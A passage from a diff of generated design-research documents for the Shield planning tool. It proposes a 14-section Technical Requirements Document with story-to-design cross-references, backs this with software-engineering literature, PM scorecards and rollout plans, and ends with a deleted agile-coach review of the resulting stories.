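    }
    # First list: refs the LLD never recorded. Second: rows no story points at.
    return sorted(from_stories - from_lld), sorted(from_lld - from_stories)
```

A story may legitimately depend on a section it never edits, so entries in the first list are better treated as prompts for review than as hard failures.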

Why Not Keep plan-architecture.md?

| | Today's plan-architecture.md | Proposed unified TRD |
|---|---|---|
| Domain coverage | De-facto infra/ADR-flavored | Both infra and backend — same template, domain-aware prompting per section |
| Origin | Shield convention; closer to ADR + HLD hybrid | IEEE 1016 + reference TRD template + Google design-doc lineage |
| HLD coverage | Solution sketch + 5 numbered decisions + PR sequencing | Full HLD viewpoint coverage: context, composition, interfaces, NFRs |
| NFRs | Implicit | Explicit §6 (forced for both domains — SLOs/RPO/RTO/cost matter for infra too) |
| Alternatives | Present (good) | Preserved in §8 — the ADR-style "decisions with trade-offs" pattern lives here |
| Rollback strategy | Present in plan-architecture.md | Promoted to first-class §14 (universal) |
| Milestones | "Deliverables" as PR sequencing | First-class §10 — feature phases (backend) or phased rollout (infra) |
| Cross-cutting | Implicit | Explicit §9 — forces IAM/cost/observability/DR for infra |
| Story traceability | None (LLD-shaped content buried in plan.json descriptions) | Each story gets design_refs[] pointing to TRD/LLD sections |
| Reviewer rubric | Free-form | Structured — /plan-review grades 14 fixed sections (with n/a — <reason> escape) |

The unified TRD subsumes everything plan-architecture.md does well (decisions, alternatives, rollback) and adds the structural rigor that infra plans currently lack (forced NFRs, Cross-Cutting, first-class Milestones).

-

What the Industry Recommends

-

IEEE 1016-2009 — Software Design Descriptions

-
-

"A representation of a software design to be used for communicating design information to its stakeholders."

-

"Design view: A representation comprised of one or more design elements to address a set of design concerns from a specified design viewpoint."
— IEEE Std 1016-2009, Clause 3 — full PDF via Çankaya University

-
-

IEEE 1016 names 12 design viewpoints (Context, Composition, Logical, Dependency, Information, Patterns-use, Interface, Structure, Interaction, State dynamics, Algorithm, Resource). A defensible HLD-vs-LLD split treats the first ~7 (Context → Interface) as HLD and the last ~5 (Structure → Resource) as LLD. The proposed TRD §7 (HLD) covers Context + Composition + Logical + Interface viewpoints; §11 (APIs Involved) covers Interface explicitly. LLD covers Structure + State + Algorithm + Resource.

-

Ian Sommerville, Software Engineering (10th ed., Ch. 6)

-
-

"Architectural design is concerned with understanding how a software system should be organized and designing the overall structure of that system."

-

"Architectural design is the critical link between design and requirements engineering as it identifies the main structural components in a system and the relationships between them."

-

"Architecture may be used as a focus of discussion by system stakeholders. … Analysis of whether the system can meet its non-functional requirements is possible. … The architecture may be reusable across a range of systems."
— Sommerville, Chapter 6 §6.1

-
-

Sommerville's three justifications for explicit architecture — stakeholder communication, NFR analysis, reuse — map directly to TRD §4 (Product Journey, stakeholder communication), §6 (NFRs explicit), §7 (HLD as reusable architectural template).

-

Roger Pressman, Software Engineering: A Practitioner's Approach (8th ed.)

-

Pressman organizes design into four layers:

-
-

"Architectural design defines the relationship between major structural elements of the software, the architectural styles and design patterns that can be used to achieve the requirements defined for the system."

-

"Component-level design transforms structural elements of the software architecture into procedural description of software components."

-
-

Pressman's split — architectural + data + interface (HLD) vs. component-level (LLD) — is the cleanest textbook mapping for the TRD/LLD layering.

-

Malte Ubl — "Design Docs at Google"

-
-

"The design doc is the place to write down the trade-offs you made in designing your software."

-

"A short list of bullet points of what the goals of the system are, and, sometimes more importantly, what non-goals are."

-

"This is where your organization can ensure that certain cross-cutting concerns such as security, privacy, and observability are always taken into consideration."

-

"A clear indicator that a doc might not be necessary are design docs that are really implementation manuals. If a doc basically says 'This is how we are going to implement it' without going into trade-offs, alternatives, and explaining decision making … then it would probably have been a better idea to write the actual program right away."
— Design Docs at Google, industrialempathy.com

-
-

Google's template — Context · Goals/Non-goals · The design · Alternatives · Cross-cutting concerns — is the empirical template Shield's existing plan-architecture.html already resembles. Adopting it explicitly closes the gap.

-

Will Larson — lethain.com

-
-

"Design documents describe the decisions and tradeoffs you've made in specific projects."

-

"A batch of five design docs is the ideal ingredient for writing an effective strategy because design documents have what bad strategies lack: detailed specifics grounded in reality."

-

"You should write a design document for any project whose capabilities will be used by numerous future projects … any work taking more than a month of engineering time."

-

"Gather perspectives widely but write alone."
— Writing an engineering strategy, lethain.com

-
-

Larson's "design-doc-as-decision-artifact" framing reinforces that the TRD should privilege decisions and trade-offs over comprehensive specification. The "write alone" rule is implementation guidance for the /plan agent: produce a single, opinionated TRD per run, not a consensus-shaped one.

-

Gergely Orosz — The Pragmatic Engineer

-
-

"Software engineers who write design docs for their architecture — and ask for reviews on it — often ship more maintainable architecture."

-

On Uber's RFC scale problems at >2,000 engineers: "Noise: Hundreds of RFCs weekly overwhelmed experienced engineers; Ambiguity: Unclear which work required documentation; Discoverability: Documents scattered across Google Drive."
— RFCs and Design Docs, blog.pragmaticengineer.com

-
-

Orosz's account of design-doc value at scale supports adopting a uniform template for Shield's TRD output. Shield's /plan audience is one team per run, so the Uber-scale "tiered templates" remediation doesn't apply — a single 14-section template is the right level of structure.

-

Simon Brown — The C4 model

-
-

"Container" — a separately runnable/deployable unit (e.g., a server-side web application, a single-page application, a desktop application, a mobile app, a database schema, a file system) that executes code or stores data.

-

"Component" — a grouping of related functionality encapsulated behind a well-defined interface. From an implementation perspective, components are typically a collection of implementation classes/objects.
— The C4 model for visualising software architecture, c4model.com

-
-

The C4 model's Container and Component levels are the natural granularity for LLD documents in Shield's setup. One LLD per Container (or per Component for finer-grained services) cleanly aligns with how engineers reason about ownership and deployability — and avoids the milestone-LLD-proliferation that per-milestone LLDs would cause for cross-cutting components.

-

Reference TRD's actual practice (Notion workspace, internal evidence)

-
-

Reference TRD Template (last edited 2025-11-04) explicitly: "HLD — Objective: Explain how the system will behave end-to-end. Include: Block diagram or sequence diagram showing data flow between frontend, backend, and external services / Key microservices involved / Event triggers, queues, APIs, and DBs touched."

-

"LLD — Objective: Capture how each component or service works internally. Include: Components / Class/State diagrams / Database schema changes / API Contracts / Non Functional Aspects (error handling, retry, config) / Caching or fallback mechanisms."
— Reference TRD Template (Notion)

-
-

Observed deviations from the reference template in real artifacts:

  • Large features split HLD and LLD into separate Notion pages. One library LLD opens: "The TRD describes what the library does and why. This LLD describes how."
  • Small features keep HLD+LLD inline but omit the section labels entirely — using functional headings like "Architecture Components" and "Implementation Plan."
  • "Solutioning" is used as a sibling term to HLD (one HLD title: "... — High-Level Design & Solutioning Document") — signals that decision-rationale lives next to the architecture, validating the Alternatives + Cross-Cutting sections.
  • One reference TRD has an explicit "Implementation Plan" section with 5 phases — a real precedent for the proposed §10 Milestones.

LLD granularity in the reference workspace is per-service/per-library (one example LLD covers a single library and is referenced by whichever milestone touches it). Shield will adopt this convention: LLDs are per-component (C4 Container/Component level), and the TRD's §10 Milestones declares which LLD components each milestone touches. A single LLD doc grows incrementally across milestones.

-

How This Works in Practice — /plan Refactor Flow

-
PRD (optional)
   │
   ▼
/plan ────────────► TRD (HLD + Milestones)  ←── replaces plan-architecture.md
   │                  │
   │                  ├─ §1–9: HLD (problem, goals, design, NFRs, cross-cutting)
   │                  ├─ §10: Milestones — each lists touched LLD components
   │                  └─ §11–14: APIs, open Qs, references, rollback strategy
   │
   ▼
plan.json (stories with design_refs[])
   │
   ├──► /implement (consumes story + design_refs[])
   ├──► /pm-sync (consumes plan.json; design_refs[] become PM-tool links)
   └──► [future] /lld <component>  ──► per-component LLD doc (14-section template from PR #43)
              │
              ├─ Header: Linked plans = [plan/M1, plan/M2, ...]   ← bidirectional
              ├─ §1 Overview names the epics/milestones served
              ├─ §14 Changelog: each edit has Story ID + sections touched
              │
              ├─ M1 may touch [lld-component-auth.md, lld-component-api.md]
              ├─ M2 may touch [lld-component-api.md, lld-component-ui.md]
              └─ Same LLD doc grows incrementally across milestones; §14 records each touch
-
-

Reference example: tesseract PR #43 (docs/superpowers/specs/2026-05-18-lld-sample.html), the Bytebite user-signup LLD: 704 lines of HTML, 14 sections (12 always-on + 2 promote-on-demand), with stable kebab-case anchors on every section and subsection. This is the structural model /lld will emit.

-

Story-to-design-section reference contract

-

Add an optional design_refs[] array to each story in plan.json:

-
{
  "id": "E1-S1",
  "title": "Implement POST /users endpoint",
  "design_refs": [
    {
      "doc": "trd",
      "section_id": "high-level-design",
      "anchor_url": "trd.md#high-level-design",
      "label": "TRD §7 High-Level Design"
    },
    {
      "doc": "lld",
      "component": "user-service",
      "section_id": "api-create-user",
      "anchor_url": "lld-user-service.md#api-create-user",
      "label": "LLD §5.1 POST /users"
    }
  ]
}
-
-

Properties:

  • Additive — adapters that don't understand design_refs ignore it. No /pm-sync schema break.
  • Component-scoped — LLD refs include component so multiple stories across multiple milestones can point at the same LLD doc; the LLD's Linked plans header and §14 Changelog close the loop on the other side.
  • Stable kebab-case anchors — section_id matches the LLD sample's explicit id="..." attributes (e.g., #api-create-user, #perf-load), not heading-derived. Confluence-style anchor-rot bugs (CONFSERVER-26897/28087/41483) don't apply because we author the IDs explicitly.
  • Subsection-resolvable — points at #api-create-user (LLD §5.1), not just #api-contracts (LLD §5). Required for the precision the LLD sample establishes (per-endpoint, per-flow, per-perf-aspect anchors).
  • Forward-resolvable — lld refs can be added when the LLD is authored; the TRD generator leaves them as TODO entries until then.
  • PM-sync adapter behavior: Confluence/Jira → web link with anchor URL. ClickUp → URL custom field (+ optional Doc relate). Notion → URL property (+ optional Database relation).
-
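The properties above translate into a handful of shape checks the eval could run on each story. The following is a hedged sketch rather than the real schema: the required keys come from the `{doc, section_id, anchor_url, label}` contract, while the rule that `anchor_url` must end in `#<section_id>`, the error strings, and the function names are assumptions inferred from the example.

```python
import re

KEBAB = re.compile(r"^[a-z0-9]+(-[a-z0-9]+)*$")
REQUIRED = ("doc", "section_id", "anchor_url", "label")


def check_design_ref(ref: dict) -> list[str]:
    """Return shape errors for one design_refs[] entry (empty list when valid)."""
    errors = [f"missing:{key}" for key in REQUIRED if not ref.get(key)]
    if errors:
        return errors
    if ref["doc"] not in ("trd", "lld"):
        errors.append(f"unknown-doc:{ref['doc']}")
    # LLD refs are component-scoped, so they must name the component.
    if ref["doc"] == "lld" and not ref.get("component"):
        errors.append("missing:component")
    if not KEBAB.match(ref["section_id"]):
        errors.append(f"not-kebab-case:{ref['section_id']}")
    # Assumed convention: the URL fragment repeats the section_id.
    if not ref["anchor_url"].endswith("#" + ref["section_id"]):
        errors.append("anchor-mismatch")
    return errors


def check_story(story: dict) -> list[str]:
    """design_refs is optional, so a story without it is valid."""
    return [e for ref in story.get("design_refs", []) for e in check_design_ref(ref)]
```

Because the field is additive, the check treats a missing `design_refs` as valid, which matches how older plan.json files and adapters are expected to behave.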

De-duplication contract (addresses the user's named risk)

| Concern | Owner doc | TRD treatment |
|---|---|---|
| User problem, personas, business impact | PRD | TRD §2 links the PRD; restates problem in 1 sentence max for self-containment |
| Functional requirements (what users do) | PRD | TRD §5 links PRD's user stories; doesn't restate them |
| Non-functional requirements | PRD names targets; TRD specifies architecture-level NFRs | TRD §6 |
| Architecture & design | TRD | TRD §7 |
| Alternatives & trade-offs | TRD | TRD §8 |
| Component-internal algorithms, schemas, contracts | LLD | TRD §11 lists which APIs; LLD specifies their internals |
| Work breakdown | plan.json | Plan generates stories; stories design_refs[] back to TRD/LLD |

Rule (paraphrased from Koko Product on PRD vs TRD): "PRD owns why; TRD owns how at architecture level; LLD owns how at component level; plan owns work breakdown. Cross-references replace restatement."

-

Failure Modes & Countermeasures

-

Community research surfaced 10 named failure modes. Five are directly addressable by Shield's eval framework + structural choices:

| Failure mode | Source | Shield countermeasure |
|---|---|---|
| Format drift across agent runs — different sessions produce differently-shaped TRDs | User's stated risk + Cvet 2020 + acatton (Lobsters) — "authors and reviewers felt that most of the RFC template was superfluous" | Schema-validated TRD eval: a fixture-based eval asserts presence of §1–14, asserts each section is non-empty (with n/a — <reason> as the only allowed escape), asserts design_refs[] shape. Backend + infra positive fixtures both pass. RED → GREEN trail required per CLAUDE.md. |
| Content duplication PRD↔TRD↔plan — same content restated, drifts independently | User's stated risk + Plane.so + Koko Product — "Keep the boundary clean." | The de-duplication contract above + a /plan-review rule: flag any TRD section that restates PRD content verbatim. |
| Undead documentation / silent divergence — doc reflects an outdated reality | Doug Turnbull (softwaredoug.com) — "most design docs lie to you. They're undead documentation"; Lucas Costa — "Either you update the doc (which nobody does) or you diverge from it silently" | Shield's /plan re-runs update the same files in place (per current behavior). Combined with git history, the TRD is a snapshot at decision time. Recommend a last_aligned_with: <commit-sha> metadata field updated by /implement when stories close. |
| Over-specification ("LLD too early") — schema/API decisions before query patterns are understood | Lucas Costa — "you have the least information at the beginning of a project, which is exactly when design docs ask you to make the most decisions" | Defer LLD authoring until a milestone that touches the component begins. TRD §11 names which APIs change; the LLD specifies their internals only at that point. |
| Implementation-manual pseudo-code — doc just narrates code with no trade-offs | Google design-docs doc — "design docs that are really implementation manuals … it would probably have been a better idea to write the actual program right away" | /plan-review rule: flag any HLD section that contains code blocks > N lines without an "Alternatives Considered" rationale. |

Five more failure modes (design-doc theatre, review-rubber-stamp, RFC firing-squad, authority fragmentation, template bloat) are governance issues not directly fixable by structural choices — flag as future /plan-review rubric expansions.

-

Decisions Locked & Open Questions

-

Decisions locked with the user (2026-05-24 → 2026-05-25)

-
  1. LLD granularity: strictly per-component (C4-inspired). One LLD per Container or Component (service, library, module). Milestones list which LLDs they touch; LLDs grow incrementally as milestones land. LLDs are typically backend-only; infra rarely needs an LLD layer.
  2. No lean variant. The full 14-section template is required for every TRD. (Orosz's tiered-template pattern applies at >2,000-engineer scale, not Shield's per-team scope.)
  3. Direct cutover. /plan stops writing plan-architecture.md immediately. No feature flag, no side-by-side period. Existing plan-architecture.md files remain readable; no migration tool needed.
  4. Section enforcement: strict via eval, with n/a — <reason> escape. All 14 TRD sections are required by the schema-validated eval. Missing any section is an eval failure with a named error. An explicit n/a — <reason> line counts as present; vague TBDs or empty sections fail.
  5. One TRD, two domains. Same 14-section template applies to backend AND infrastructure work. Domain-aware prompting per section in /plan's SKILL.md surfaces the right interpretation; the eval and /plan-review rubric do not fork.
  6. §14 Rollback Strategy is a first-class section. Preserves the strongest property of today's plan-architecture.md.

Open questions for the implementation phase

-
  1. design_refs[] resolution at PM-sync time. Should adapters auto-create Confluence/Notion pages and link them, or only emit URLs and trust the user to author the pages? Recommendation: emit URLs only in v1; adapter authoring is a v2 enhancement.
  2. Section-ID stability. TRD section anchors should be stable kebab-case slugs (#high-level-design), not heading-derived (which break on rename per Confluence CONFSERVER-26897/28087/41483). Concrete recommendation: emit explicit {#section-id} markdown anchors in the TRD template, and validate the slug set is the canonical 14 in the eval.
  3. TRD ↔ LLD linking direction. TRD §10 lists LLDs each milestone touches (forward link). Should LLDs maintain backlinks to milestones/TRD? Recommendation: yes, but auto-generated — /lld reads the TRD, fills in a "Referenced By" section in the LLD pointing back to milestones. Avoids manual link-rot.
  4. /pm-sync adapter behavior for design_refs[]. Confluence → web link with anchor URL. Jira → remote issue link. ClickUp → URL custom field. Notion → URL property. Open: should ClickUp/Notion also populate a Relationship/Database-relation if the design doc exists in the same tool? Recommendation: v1 emits URL only, structured relationships are v2.
  5. Eval shape for TRD. Concrete eval design: a fixture TRD with all 14 sections present passes; fixtures missing any section fail with a named error per section. Bidirectional check: the LLM does not add unprompted sections (drift-by-addition). n/a — <reason> lines count as present; vague TBDs or empty sections do not. Coverage includes both backend and infra positive fixtures. All covered by shield/evals/plan-trd.yaml fixture set.

Migration Path / Reversibility

-

The refactor is a direct cutover; reversibility cost is low:

-
  • Forward: /plan adds TRD generation step before plan.md/plan.json. plan-architecture.md is replaced by trd.md immediately (no feature flag). Story schema gains optional design_refs[]. /plan-review gets new TRD-section rules. Estimated work: one PR for the /plan command + plan-docs SKILL.md changes, one PR for evals, one PR for /plan-review rule additions.
  • Reversal: If the TRD approach proves wrong, revert plan-docs/SKILL.md to the pre-refactor template + restore plan-architecture.md generation. Existing trd.md files remain readable in old feature folders. design_refs[] is optional everywhere, so removing it is a no-op for downstream adapters.
  • Existing artifacts: Pre-refactor feature folders keep their plan-architecture.md — no rewrite, no migration. New folders get trd.md. This is git-history-friendly and doesn't break anyone reading older docs.

Summary

-

The TRD = HLD + PM-lens milestones + Rollback Strategy design is well-supported by the IEEE 1016 / Sommerville / Pressman lineage, mirrors the reference TRD template, and aligns with Google + Uber + Larson + Orosz modern practice. The unified 14-section TRD template covers both backend and infrastructure work, with domain-aware prompting per section and an explicit n/a — <reason> escape for sections that genuinely don't apply; the 14-section LLD template (anchored in tesseract PR #43's Bytebite sample) is the per-component layer authored separately and is typically backend-only since infra code is declarative-spec-as-code. LLDs are per-component (C4-inspired) — a single LLD covers one Container or Component, lists multiple Linked plans in its header, and grows incrementally as milestones touch it; §14 Changelog records each touch with a Story ID. Story traceability via additive design_refs[] (component-scoped, subsection-precise) is the highest-signal way to link work to design without breaking /pm-sync. The two named risks (format drift, content duplication) have concrete countermeasures: schema-validated evals enforcing all sections (and §12's 8 forced subsections in the LLD), and a de-duplication contract ("PRD owns why, TRD owns how at architecture, LLD owns how at component, plan owns work breakdown"). The refactor is a direct cutover with no feature flag; reversal is a simple revert with no migration burden.

-

Product Lens

-

Scorecard (PM1–PM11)

| Dim | Name | Grade | Severity | Gap |
|---|---|---|---|---|
| PM1 | User impact clarity | D | Critical | Roles named abstractly ("reviewers", "engineers"); no quantified before/after per persona |
| PM2 | Problem–solution fit | B | Critical | Missing explicit Problem Statement section before Decision; named risks appear pre-problem |
| PM3 | Scope discipline | B | Important | 14 TRD + 14 LLD sections (+ §12's 8 forced subsections) reads kitchen-sink; no MVP cut explicit |
| PM4 | Prioritization rationale | D | Important | Three PRs listed without effort/impact tags or stated dependencies |
| PM5 | Stakeholder communicability | D | Important | Jargon-saturated; no plain-language summary a non-technical reader could follow |
| PM6 | Market / competitive awareness | A | Warning | Strong: plan-architecture.md, reference TRD, Google, Uber, IEEE 1016, C4, arc42, ADR all compared |
| PM7 | Adoption / rollout risk | B | Important | Technical risks covered; adoption-side risks (learning curve, change mgmt, partner buy-in) missing |
| PM8 | Success metrics defined | F | Important | No measurable post-ship outcome (no thresholds, targets, observable behaviors) |
| PM9 | Reversibility / exit cost | A | Warning | Strong: clean revert path, no migration burden, additive schema |
| PM10 | Business value alignment | F | Critical | No tie to business goal/OKR/customer escalation/compliance — justified entirely on engineering grounds |
| PM11 | Framing coverage honored | B | Important | All 5 PF7 voices quoted; PF8 "Vendor docs" category has refs but no verbatim body quote |

Composite: 2A · 4B · 3D · 2F (≈ C+ overall). 3 Critical gaps to close before this is plan-ready: PM1 (user-impact quantification), PM2 (Problem Statement section), PM10 (business-value tie-in).

-

User Impact Analysis

-

The proposed TRD refactor directly serves five user populations identified in the framing brief, and the research provides differentiated evidence for each:

-
  • Shield maintainer — Highest leverage beneficiary. The named risks (format drift, content duplication) get concrete countermeasures: a schema-validated eval enforces all 14 TRD sections, and the de-duplication contract codifies ownership across PRD/TRD/LLD/plan. Risk of inaction: continued ad-hoc plan-architecture.md output that /plan-review can only grade free-form.
  • Staff/senior engineers reading the TRD — Gain a predictable artifact grounded in IEEE 1016 viewpoints, Sommerville's three architecture justifications, and the reference TRD template. Research quantifies coverage: 12 IEEE viewpoints, split ~7 HLD / ~5 LLD; 14 canonical TRD sections; 14 canonical LLD sections (12 always-on + 2 promote-on-demand).
  • Junior/mid engineers consuming via /implement — Gain unambiguous design pointers via design_refs[] with subsection-precision (e.g., #api-create-user not #api-contracts). Research cites the Bytebite sample (PR #43, 704 lines, kebab-case anchors on every section and subsection) as the concrete structural target.
  • /plan-review reviewer agents — Gain stable section anchors enabling structured rubrics instead of free-form grading. Research surfaces five mechanically-enforceable rules.
  • /pm-sync — Hard backward-compat constraint is met: design_refs[] is additive, adapters ignore unknown fields. No schema break.

Unquantified gaps:

  • No estimate of how many existing feature folders carry plan-architecture.md. Direct-cutover migration risk is asserted "low" but not measured.
  • No baseline for current /plan-review defect-catch rate vs. expected post-refactor rate.
  • "Future LLD-authoring command" is described but its build effort is not estimated.

Scope Recommendation

-

Essential (MVP — ship in v1 cutover):

  1. /plan emits trd.md with the canonical 14 sections (replaces plan-architecture.md).
  2. Stable kebab-case section anchors emitted explicitly as {#section-id} markdown anchors.
  3. plan.json story schema gains optional additive design_refs[] with {doc, section_id, anchor_url, label}.
  4. Schema-validated eval fixture pair (positive + missing-section negatives) under shield/evals/plan-trd.yaml.
  5. /plan-review rules for the 14 required sections (with n/a — <reason> escape) + at least one duplication-detection rule.
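
The optional design_refs[] entry on a plan.json story can be pictured as a small typed record. This is a minimal sketch, not Shield's actual code: the `DesignRef` class and the `story_with_refs` helper are hypothetical names, and the rule that `anchor_url` ends in `#<section_id>` is an assumption made for illustration. The `doc` enum (trd, lld, prd) is taken from the backend review further down.

```python
from dataclasses import dataclass, asdict

# Enum values come from the review text; enforcing them here is an assumption.
ALLOWED_DOCS = {"trd", "lld", "prd"}


@dataclass(frozen=True)
class DesignRef:
    """One pointer from a story to a design-doc section (hypothetical model)."""
    doc: str
    section_id: str
    anchor_url: str
    label: str

    def __post_init__(self):
        if self.doc not in ALLOWED_DOCS:
            raise ValueError(f"unknown doc type: {self.doc!r}")
        # Assumed convention: the URL fragment is the section slug.
        if not self.anchor_url.endswith("#" + self.section_id):
            raise ValueError("anchor_url must end with #<section_id>")


def story_with_refs(story: dict, refs: list) -> dict:
    """Return a copy of the story with design_refs[] attached.

    The field is additive: every existing key is preserved unchanged.
    """
    out = dict(story)
    out["design_refs"] = [asdict(ref) for ref in refs]
    return out
```

Because the field is only ever added, a consumer that ignores unknown keys reads the same story as before.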

Defer (v2 enhancements):

  • /lld <component> command: template locked; authoring command is "future". v1 leaves lld refs as TODO entries.
  • Adapter auto-creation of Confluence/Notion pages from design_refs[]: v1 emits URLs only.
  • Structured ClickUp/Notion relationships: v1 emits URLs only.
  • last_aligned_with: <commit-sha> metadata for undead-doc countermeasure.
  • /lld auto-generated "Referenced By" backlinks.
  • Governance failure-mode rules (design-doc theatre, review-rubber-stamp, etc.).

Cut entirely:

  • Lean TRD variant: research locks this as rejected. Do not relitigate.
  • Migration tool for existing plan-architecture.md: direct cutover, no migration.

Prioritization Framework

| Priority | Work item | Effort | Impact | Dependency |
| --- | --- | --- | --- | --- |
| P0 | Schema-validated TRD eval fixture pair + section slug allow-list | M | Very high: strongest format-drift countermeasure; CLAUDE.md mandate | Section list locked (done) |
| P0 | /plan command + plan-docs/SKILL.md updates to emit trd.md with 14 canonical sections, domain-aware prompting per section, and explicit {#section-id} anchors | L | Very high: the actual cutover | None |
| P0 | plan.json story schema: additive design_refs[] | S | High: story traceability + /implement consumption | None (additive) |
| P1 | /plan-review rules for required-section presence + 1 duplication-detection rule | M | High: converts free-form review into structured grading | P0 schema lands first |
| P1 | /pm-sync adapter handling for design_refs[] URL emission (all four adapters) | M | Medium: read-only forward link in v1 | design_refs[] shape locked (done) |
| P2 | last_aligned_with metadata + /implement update on story close | S | Medium: undead-doc countermeasure | After v1 stable |
| P2 | /plan-review rules for remaining failure-mode countermeasures | M | Medium: incremental review quality | After P1 |
| P3 (deferred) | /lld <component> command + LLD eval fixtures | L | High for LLD consumers, but no LLD consumers exist yet | After v1, separate epic |
| P3 (deferred) | Adapter auto-creation of design-doc pages | L | Low: research recommends URL-only in v1 | After /lld |

Sequencing rationale: P0 items land together in the cutover PR (eval can't ship before generator; generator shouldn't ship without eval). design_refs[] is additive and zero-risk, so it goes in v1 even with no consumer yet — locking the contract early avoids a v2 migration. /lld is genuinely deferrable because the TRD references LLDs by URL with TODO entries until the command exists.

-

Stakeholder Summary

-

Shield's /plan command today produces a work breakdown and a free-form architecture sketch (plan-architecture.md). Engineers reading the output have no predictable place to find the system design, and reviewers have no consistent shape to grade against. The research recommends replacing the free-form sketch with a Technical Requirements Document (TRD) — a 14-section template grounded in the IEEE software-design standard, mirrored from the reference TRD template, and consistent with how Google, Uber, and respected practitioners (Will Larson, Gergely Orosz) describe modern design-doc practice. The TRD covers the what and the architecture-level how of a feature. The deeper component-internal details (database schemas, API internals, race-condition handling) move to per-component Low-Level Design (LLD) documents authored separately when each milestone begins, following a 14-section template Shield already has a working sample for. Every story in the work plan gains an optional pointer to the exact section of the TRD or LLD it depends on, so an engineer picking up a story can find the design in one click. The change ships as a direct replacement with no migration burden — existing feature folders keep their old artifacts and stay readable. The two biggest risks of templated design docs (templates drifting in shape across runs, and the same content being restated in three places that then disagree) are addressed with an automated check that enforces the section list and a written ownership rule of which document owns which content. The first release lands the new TRD output, the schema-enforcing test, and the story-to-design pointers; the LLD command and richer reviewer rules follow in a second release.

-

Critical gaps — user verdict (2026-05-24)

-

The three Critical-severity findings were reviewed with the requester. All three are acknowledged as artifacts of applying the full PM1–PM11 rubric (designed for PRDs / product features) to an internal-tooling research artifact. Verdict per gap:

  1. PM1 (quantified user impact per persona). Resolution: the refactor's value is a baseline add to how tech teams currently work; the personas (plan author, reviewer, /implement consumer) all benefit uniformly. No additional quantification needed for an internal tooling change.
  2. PM2 (explicit Problem Statement section). Resolution: not required. Going to implementation directly; the Context paragraph at the top of this doc carries enough framing for engineering work.
  3. PM10 (business-value tie-in). Resolution: the value is to help tech teams iterate faster by automating planning steps that previously required free-form judgment. Not a business-OKR question for an internal Shield meta-tooling refactor.

PM8 (success metrics) and PM4/PM5 (prioritization rationale, stakeholder communicability) are Important but not blocking — folded into the implementation work where the Prioritization Framework table already addresses sequencing.

-

References

- -

Internal references (Notion — reference workspace)

  • Reference TRD Template (last edited 2025-11-04)
  • Reference LLD example (per-library scope, 2026-05-10)
  • Reference HLD example (module-first, 2026-04-15)
  • Reference HLD example with "Solutioning" sibling label (2026-04-01)
  • Reference HLD example (minimal, small features, 2026-05-21)
  • Reference TRD with explicit 5-phase Implementation Plan precedent (2026-01-04)

Internal references (Shield repo)

  • docs/shield/agent-behavior-decomposition-20260520/outputs/plan-architecture.html: baseline ADR+HLD hybrid the TRD must improve on
  • tesseract PR #43, docs/superpowers/specs/2026-05-18-lld-sample.html: canonical 14-section LLD sample (Bytebite user-signup); reference structure for the /lld command

Further Exploration

-

Curated for going deeper; NOT cited in body above.

-

Books

  • Bass, L., Clements, P., Kazman, R. (2021). Software Architecture in Practice (4th ed.). The module/component-and-connector/allocation viewtype taxonomy is a cleaner alternative to Pressman's four layers.
  • Bryar, C., Carr, B. (2021). Working Backwards. Amazon's PR/FAQ tradition for the PRD-upstream framing.
  • Fournier, C. (2017). The Manager's Path. ADRs vs design docs distinction in tech-lead chapters.

Long-form blogs / articles

  • Brown, S. "The C4 model for visualising software architecture." c4model.com. Quoted in body above; Container/Component levels are the chosen LLD granularity.
  • arc42 template. arc42.org. Open-source 12-chapter architecture-doc scaffold widely used in DE/EU teams.
  • ThoughtWorks. "Lightweight architecture decision records." For the "TRD = HLD + ADR" hybrid Shield is gravitating toward.

Videos / talks

  • Larson, W. on engineering strategy at LeadDev. For the "five design docs → one strategy" pattern.

Courses

  • (None curated this round; open opportunity.)

Podcasts / podcast episodes

  • StaffEng Podcast: multiple episodes on design-doc practice with senior+ engineers.

Other

  • Joel Henderson's ADR catalog. adr.github.io. Patterns for ADRs as supplement to (not replacement of) HLD.
  • HashiCorp's public RFC template. Useful comparison point for infra-leaning teams.
-
Generated by Shield
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
deleted file mode 100644
index fe95f4e3..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
+++ /dev/null
@@ -1,165 +0,0 @@
Plan Review — /plan TRD refactor

Agile Coach — Detailed Findings

-
-

Back to summary

-
-

Agile Coach Review (Grade: A-)

| # | Evaluation Point | Grade | Notes |
| --- | --- | --- | --- |
| AC1 | Story sizing | A | 12 stories across 5 epics, each story is a clear, atomic deliverable. None are multi-week; none are trivial sub-tasks. EPIC-3-S2 is the largest (14 negative fixtures) but is appropriately scoped as one cohesive deliverable. |
| AC2 | Story independence | A- | M1 stories can largely run in parallel (EPIC-1-S1, EPIC-2-S1, EPIC-3-S1 are independent docs/schema/fixture tasks). EPIC-1-S2 depends implicitly on EPIC-1-S1's slug allow-list; EPIC-2-S2 depends on EPIC-2-S1; EPIC-3-S2 depends on EPIC-3-S1's positive fixture. These intra-milestone deps could be explicit but are inferable from content. |
| AC3 | Dependency ordering | A | Milestones have an explicit DAG: M1 → M2 → M3 via depends_on in sidecar.milestones[]. No cycles. EPIC-3-S3 explicitly orders RED before GREEN. Story sequencing within M1 is logical (template → emit → re-run guard; schema → populate; fixtures → wire). |
| AC4 | Context completeness | A | Every story has a "why" paragraph in description. Examples: EPIC-2-S1 explains "preserve back-compat (missing field is ignored)"; EPIC-5-S1 explains "Countermeasure for undead-doc drift"; EPIC-1-S3 explains the deterministic re-run policy and "no migration." |
| AC5 | Requirements clarity | A | Requirements are specific and measurable. Examples: "exactly 14 entries" in slug list (EPIC-1-S1 AC2), "40-char hex sha" (EPIC-5-S1 AC2), "> 80 characters of consecutive verbatim overlap" (EPIC-4-S2 task), ">20-line code block" threshold (EPIC-5-S2). |
| AC6 | Implementation step quality | A- | Tasks cite exact files, exact field names, and exact thresholds. Minor gap: EPIC-4-S3 says "Update the relevant adapter logic" without naming the adapter files for each tool (just the directory). |
| AC7 | Acceptance criteria testability | A | Every AC is testable. Examples: "exit code 0" (EPIC-3-S1), "reports that section by slug as a Critical finding" (EPIC-4-S1), "40-char hex sha" (EPIC-5-S1). No vagueness. |
| AC8 | Sprint-readiness | A | Each story declares "status": "ready". File paths, schemas, thresholds, and named errors are all pre-decided. A developer could pick up any story without a planning meeting. |
